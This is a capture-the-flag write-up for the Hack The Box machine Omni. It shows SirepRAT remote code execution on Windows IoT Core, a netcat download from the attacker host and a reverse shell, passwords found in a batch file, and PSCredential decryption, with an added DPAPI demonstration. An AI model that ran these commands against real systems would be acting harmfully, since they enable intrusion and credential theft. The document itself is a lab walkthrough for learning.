Recon

The Nmap results show that port 8080 is open but requires authentication. The Basic realm is reported as Windows Device Portal, which is unlike what one usually sees on 8080, so I looked it up.

# Nmap 7.80 scan initiated Sun Sep  6 19:07:02 2020 as: nmap -p- -sC -sV -oN nmap/initial 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.075s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=9/6%Time=5F54C3C4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 6 19:12:12 2020 -- 1 IP address (1 host up) scanned in 310.26 seconds

The other ports are fairly standard: 5985 is WinRM and 135 is Windows RPC.

After a Google search and a look at the official documentation, I found the following. It confirms that this is an IoT device, which explains why the official listing gives the system type as "Other".

Device family: IoT
On by default?: Yes, in Dev Mode
HTTP: 8080
HTTPS: Enable via regkey
USB: N/A

Get-Shell

RCE

For a machine rated this easy, the first thing to do is of course to look for a PoC. I found an article that says:

The researcher said the security issue he discovered allows an attacker to run commands with SYSTEM privileges on Windows IoT Core devices.

The article also mentions that the project, SirepRAT, has been open-sourced. Since RCE is possible, I cloned it locally to try it out.

The test confirmed that we can execute code remotely.

┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c dir C:\\" --v
---------
Volume in drive C is MainOS
Volume Serial Number is 3C37-C677

Directory of C:\

07/20/2020 02:36 AM <DIR> $Reconfig$
10/26/2018 11:35 PM <JUNCTION> Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
10/26/2018 11:37 PM <DIR> Program Files
10/26/2018 11:38 PM <DIR> PROGRAMS
10/26/2018 11:37 PM <DIR> SystemData
10/26/2018 11:37 PM <DIR> Users
07/03/2020 10:35 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 577,126,400 bytes free

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 584, payload peek: ' Volume in drive C is MainOS Volume Serial Numbe'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

Reverse Shell

Of course, it is not that simple. Because the operating system is not a regular Windows, many commonly used PowerShell commands are unavailable, and the malicious payloads generated by msfvenom do not work either.

The approach I used here was to upload a 64-bit netcat and use it to obtain a reverse shell.

The specific steps are as follows.

┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $cat ../command
Invoke-WebRequest -Uri 10.10.16.5/nc64.exe -OutFile C:\\users\\Public\\nc64.exe
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell Invoke-WebRequest -Uri 10.10.16.5/nc64.exe -OutFile C:\\users\\Public\\nc64.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\users\Public\nc64.exe" --args "10.10.16.5 1337 -e powershell.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

After getting the shell, common commands such as whoami do not work; $env:username returns the current user name, DefaultAccount.

┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni]
└──╼ $nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.204.
Ncat: Connection from 10.10.10.204:49682.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> $env:username
$env:username
DefaultAccount
PS C:\>

User && Root.txt

We see that there are no users under Users; all of them live under Data\Users. Common enumeration tools, including winPEAS.exe, also cannot be run, so I searched for common file types such as bat, vbs and txt and found a suspicious hidden file, r.bat.

PS C:\> gci Data\Users
gci Data\Users


Directory: C:\Data\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/4/2020 9:48 PM administrator
d----- 7/4/2020 9:53 PM app
d----- 7/3/2020 11:22 PM DefaultAccount
d----- 7/3/2020 11:22 PM DevToolsUser
d-r--- 9/7/2020 10:17 AM Public
d----- 7/4/2020 10:29 PM System

PS C:\> get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force
get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force


Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 8/21/2020 12:56 PM 247 r.bat


Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2018 11:36 PM 744 Build.bat


Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2018 11:36 PM 925 Pester.bat


PS C:\>

The bat file contains the passwords of app and administrator. Recalling the web page that required a login, I tried these passwords and logged in successfully.

PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT

The web portal can run commands as the logged-in user. Logging in as Administrator and combining this with the previously uploaded nc64.exe gives a shell, and root.txt turns out not to be in the usual form.

PS C:\Data\users> cd Administrator
cd Administrator
PS C:\Data\users\Administrator> dir
dir


Directory: C:\Data\users\Administrator


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/3/2020 11:23 PM 3D Objects
d-r--- 7/3/2020 11:23 PM Documents
d-r--- 7/3/2020 11:23 PM Downloads
d----- 7/3/2020 11:23 PM Favorites
d-r--- 7/3/2020 11:23 PM Music
d-r--- 7/3/2020 11:23 PM Pictures
d-r--- 7/3/2020 11:23 PM Videos
-ar--- 7/4/2020 9:48 PM 1958 root.txt


PS C:\Data\users\Administrator> type root.txt
type root.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">[DPAPI-encrypted hex blob omitted]</SS>
</Props>
</Obj>
</Objs>
PS C:\Data\users\Administrator>

I had previously run commands as another user in PowerShell, and referring to this article, which says:

However, some cmdlet does not utilize the SecureString and require password in plain text. The SecureString object in this case will need to be decrypted into to plain text. If the account information has been constructed into a PSCredential object, the password could be extracted in plain text.

Since the password has been stored as a PSCredential, we can recover the plaintext. Using the method from the article we obtain root.txt; user.txt works the same way.

PS C:\Data\users\Administrator> $UserCred = Import-Clixml -Path root.txt
$UserCred = Import-Clixml -Path root.txt
PS C:\Data\users\Administrator> $UserCred.GetNetworkCredential().password
$UserCred.GetNetworkCredential().password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\Data\users\Administrator>
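An added example, not from the write-up, showing why root.txt could only be read from the Administrator shell: on Windows PowerShell, Export-Clixml protects the SecureString with DPAPI in CurrentUser scope, so Import-Clixml on any other account cannot decrypt it. The temp path and the flag value are constructed.

```powershell
# Added example (not the box's own file). Reproduces how a file like root.txt is
# created with Export-Clixml and reads it back, catching the DPAPI failure that
# another account (for example DefaultAccount) would hit on an Administrator-exported file.
function Export-DemoCredential {
    param([string]$Path)
    # Constructed sample values; the real root.txt used UserName "flag" and a different secret.
    $secure = ConvertTo-SecureString 'example-flag-value' -AsPlainText -Force
    $cred   = New-Object System.Management.Automation.PSCredential('flag', $secure)
    # The <SS> element is DPAPI-encrypted under the exporting user's key (CurrentUser scope),
    # so only the same Windows account on the same machine can turn it back into plaintext.
    $cred | Export-Clixml -Path $Path
}

function Read-DemoCredential {
    param([string]$Path)
    try {
        $cred = Import-Clixml -Path $Path -ErrorAction Stop
    } catch {
        # Reading as a different user fails here with "Key not valid for use in specified state."
        return "cannot decrypt as $env:USERNAME : $($_.Exception.Message)"
    }
    if ($cred -isnot [System.Management.Automation.PSCredential]) {
        return 'file is not a PSCredential export'
    }
    # GetNetworkCredential() decrypts the SecureString in the caller's own DPAPI context.
    return $cred.GetNetworkCredential().Password
}

$tmp = Join-Path $env:TEMP 'demo-cred.xml'
Export-DemoCredential -Path $tmp
Select-String -Path $tmp -Pattern '<SS N="Password">'   # shows the encrypted hex, as in root.txt
Read-DemoCredential -Path $tmp                           # same user: example-flag-value
Remove-Item $tmp
```

Running Read-DemoCredential on the same file from another account returns the "cannot decrypt" message instead of the secret, which is why the DefaultAccount shell obtained earlier was not enough to read root.txt.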